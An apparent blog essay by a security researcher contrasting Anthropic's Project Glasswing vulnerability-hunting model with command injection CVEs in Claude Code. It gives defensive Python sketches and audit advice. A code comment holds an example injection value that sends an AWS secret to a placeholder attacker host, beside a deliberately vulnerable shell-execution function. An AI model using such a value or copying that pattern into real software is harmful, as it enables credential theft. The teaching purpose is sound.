Security announcements do not usually come with built-in counterpoints, but Anthropic delivered one this week.

On April 7, the company unveiled Project Glasswing, a restricted program that gives vetted partners access to Claude Mythos Preview, a frontier model that has autonomously discovered thousands of previously unknown vulnerabilities in every major operating system and browser. The model found a 17-year-old remote code execution flaw in FreeBSD that grants unauthenticated root access over the network. It found a 27-year-old bug in OpenBSD. Anthropic committed $100 million in usage credits to the program and acknowledged, with unusual candor, that it did not train Mythos to have offensive security capabilities. Those capabilities emerged from general improvements in reasoning and code understanding. The partner list reads like a who’s who of enterprise technology: AWS, Apple, Cisco, CrowdStrike, Google, JPMorgan Chase, Microsoft, NVIDIA, and Palo Alto Networks, all operating under coordinated disclosure agreements.

Six days earlier, a researcher noticed that Claude Code version 2.1.88 had shipped a 59.8 MB source map file as a debugging artifact in its npm package, exposing the full TypeScript source of Anthropic’s CLI product to anyone who downloaded it. That source code contained the patterns that became CVE-2026-35022, CVE-2026-35021, and CVE-2026-35020: three OS command injection vulnerabilities sharing one root cause, all exploitable by anyone who could influence Claude Code’s configuration in a CI/CD environment. The CVSS score on CVE-2026-35022 is 9.8. The chain from leaked source to published exploit took less than two weeks.

Both stories are about the same organization making decisions under the same competitive pressure. Neither is complete without the other, and together they define the central tension that every AI company building agentic developer tooling will face for the next 18 months.

The Source Map Is the Story

The vulnerability details matter, but the discovery path matters more. Source map files exist to help developers debug minified JavaScript by mapping compressed production code back to its readable original. They are a development convenience, not a shipping artifact. When Claude Code version 2.1.88 published its npm package with cli.js.map included, it handed every security researcher on the planet the full TypeScript codebase in one afternoon.
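To see why a shipped source map is equivalent to shipping the source itself: a source map is just a JSON document, and its sourcesContent array can embed the complete, unminified original files alongside the line mappings. A minimal sketch of extracting that content, using only the standard source map JSON fields:

```python
import json

# A source map is JSON. Beyond line mappings, its "sourcesContent" array
# can carry the full text of every original source file. Anyone holding
# the .map file can recover the codebase with a few lines of parsing.
def extract_sources(map_text: str) -> dict[str, str]:
    """Map each original file path to its embedded source text."""
    source_map = json.loads(map_text)
    sources = source_map.get("sources", [])
    contents = source_map.get("sourcesContent") or []
    return dict(zip(sources, contents))
```

Run against a 59.8 MB map like the one in the Claude Code package, this yields the readable TypeScript tree in one pass; no reverse engineering required.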

The injection patterns were not subtle. All three CVEs share a single root cause: unsanitized string interpolation into shell-evaluated execution. The affected configuration values (apiKeyHelper, awsAuthRefresh, awsCredentialExport, gcpAuthRefresh) are fields that Claude Code uses to manage authentication credentials in automated environments. An attacker who can influence those configuration values can inject shell metacharacters that execute arbitrary commands with the privileges of the user or CI/CD environment. The three CVEs differ only in their injection point; the underlying failure is identical.
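The failure class is easy to reproduce. The sketch below is illustrative Python, not Anthropic’s actual TypeScript, and the function names are invented; it shows the difference between handing a configuration value to a shell for evaluation and executing it as a plain argument vector:

```python
import shlex
import subprocess

# VULNERABLE pattern (illustrative): the configured helper command is
# evaluated by a shell, so metacharacters in the value become commands.
# A value like "get-key; curl attacker.example/$AWS_SECRET_ACCESS_KEY"
# runs both the helper and the exfiltration step.
def run_helper_vulnerable(helper_cmd: str) -> str:
    result = subprocess.run(helper_cmd, shell=True,
                            capture_output=True, text=True)
    return result.stdout

# SAFER pattern: tokenize the value and execute it without a shell.
# Metacharacters survive only as literal argument text; they are
# never interpreted.
def run_helper_safe(helper_cmd: str) -> str:
    argv = shlex.split(helper_cmd)  # tokens only, no evaluation
    result = subprocess.run(argv, capture_output=True, text=True)
    return result.stdout
```

In the safe variant, an injected `; curl ...` suffix is passed to the helper binary as inert arguments rather than executed, which is why removing shell evaluation closes all three CVEs at once.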

What makes this particularly consequential is the context in which Claude Code runs. Developers and platform teams routinely configure AI coding assistants with privileged credentials: AWS access keys, GCP service accounts, API tokens for internal services. The tool needs those credentials to function. A command injection vulnerability in that context does not merely execute arbitrary code; it converts a code execution bug into a credential exfiltration pipeline with almost no additional attacker effort. The trust developers extend to AI coding assistants, running them in CI/CD with the same permissions they would grant a senior engineer, amplifies the impact of precisely this class of flaw.

Capability Versus Practice

The juxtaposition is not irony for its own sake. It reflects a structural problem in how AI companies allocate security attention.

Anthropic’s Glasswing program demonstrates what happens when a company commits serious resources and deliberate restraint to a security capability problem. The decision to restrict Mythos to vetted partners, to invest $100 million in usage credits, to commit $4 million to open-source security organizations, and to require coordinated disclosure is exactly the kind of responsible deployment that the industry claims to want. The zero-days Mythos found are real, credible, and consequential. A 17-year-old FreeBSD RCE that grants root over NFS from an unauthenticated remote position is the kind of finding that reshapes how the industry thinks about AI-augmented security research.

The Claude Code CVE cluster demonstrates what happens when shipping velocity outpaces the security review cycle. AI companies operate under intense competitive pressure to release agentic tools that run with developer-level privileges. The review processes built for web applications and API services do not map cleanly to CLI tools that execute shell commands based on user-controlled configuration in automated pipelines. The source map leak itself is evidence of the velocity problem: a debugging artifact that should have been stripped before publishing made it into a production npm package, which means the publishing pipeline did not include the checks that would have caught it.

The lesson is not that Anthropic is uniquely careless. Every AI company shipping agentic developer tools is operating under the same set of pressures. The lesson is that the organizations with the best offensive security research capabilities are not automatically producing the most secure software. Finding bugs is a different organizational muscle than not shipping them.

The Broader Pattern

This is not an isolated case study. The same week that the Claude Code CVEs were published, the broader AI infrastructure ecosystem disclosed its own cluster of vulnerabilities across NVIDIA Triton, HuggingFace Transformers, PraisonAI, vLLM, BentoML, Gradio, and Ollama. AI serving frameworks and agent SDKs are a category of software that barely existed three years ago and has received almost no sustained security research attention relative to its deployment footprint. The tooling that runs AI in production is now as target-rich as the applications it serves.

Meanwhile, three separate threat actor groups converged on developer environments as their primary attack surface that same week: North Korean operators behind the Contagious Interview campaign, the GlassWorm cluster targeting IDE extensions, and TeamPCP trojanizing the telnyx PyPI package. The attack surface has relocated from the endpoint to the workstation of the person writing the code that runs on the endpoint. AI coding assistants, with their privileged credentials and shell execution capabilities, sit squarely in that contested space.

What Defenders Should Do Now

Organizations running Claude Code or the Claude Agent SDK in automated environments should audit every CI/CD pipeline for injection-susceptible configuration values, particularly apiKeyHelper, awsAuthRefresh, awsCredentialExport, and gcpAuthRefresh. Any pipeline where those values could be influenced by external input should be treated as compromised until verified.
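An audit like that can be partially automated. The sketch below checks a parsed configuration for shell metacharacters in the four advisory-named fields; it is a starting heuristic, not a complete detector, and the output format and metacharacter set are my own choices:

```python
import re

# The four fields named in the advisories.
RISKY_KEYS = {"apiKeyHelper", "awsAuthRefresh",
              "awsCredentialExport", "gcpAuthRefresh"}

# Common shell metacharacters; a conservative, not exhaustive, set.
METACHARS = re.compile(r"[;&|`$<>(){}\n]")

def audit_config(config: dict, source: str = "<config>") -> list[str]:
    """Flag risky fields whose values contain shell metacharacters."""
    findings = []
    for key in sorted(RISKY_KEYS & set(config)):
        value = str(config[key])
        if METACHARS.search(value):
            findings.append(f"{source}: {key} contains shell metacharacters")
    return findings
```

Run this over every settings file a pipeline can write to, and treat any hit, or any path where those fields are writable by external input, as grounds for credential rotation.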

More broadly, the operational recommendation is to treat AI coding assistants as credential-holding privileged infrastructure, not productivity utilities. Apply the same access review process you would use for a service account or a deployment key. Restrict execution environments to least-privilege configurations. If the tool does not need shell access, revoke it.

Source maps are a security artifact, not just a debugging convenience. Review npm publishing configurations to confirm that source maps are stripped or excluded from production packages before they reach the registry. The Claude Code leak is unlikely to be the last time a source map exposes an attack surface that the development team did not intend to publish.
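A pre-publish gate for this is a few lines of code. The sketch below filters a list of files that would be published (for npm, the paths reported by `npm pack --dry-run` are the authoritative list) and fails the build if any source map would reach the registry; the function names are mine:

```python
from typing import Iterable

def shipped_source_maps(file_list: Iterable[str]) -> list[str]:
    """Return any source map files that would be published.

    Intended as a CI gate: a non-empty result should fail the build.
    node_modules is excluded because dependency-internal maps are a
    separate (upstream) problem.
    """
    return sorted(
        path for path in file_list
        if path.endswith(".map") and not path.startswith("node_modules/")
    )
```

Pairing a check like this with an explicit `files` allowlist in package.json gives two independent layers; either one would have kept cli.js.map out of the 2.1.88 release.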

The Claude Code CVE cluster is also unlikely to be an isolated case. Any agentic developer tool that executes shell commands based on configuration values is a candidate for the same class of vulnerability, regardless of vendor. The question is not whether other tools have similar flaws. The question is whether anyone has looked.

Anthropic built the most capable security AI the industry has ever seen and shipped a credential exfiltration chain in its own CLI the same week. That is not a contradiction. It is a demonstration that offensive capability and defensive practice operate on different organizational timelines, and that closing the gap between them is the actual hard problem in AI security.

Josh Taylor
Behavioral Cybersecurity Researcher & SOC Leader

Josh Taylor is a behavioral cybersecurity researcher and PhD candidate specializing in adversarial cognition. His research explores the intersection of cognitive science and cyber defense, focusing on how understanding attacker psychology can transform security operations.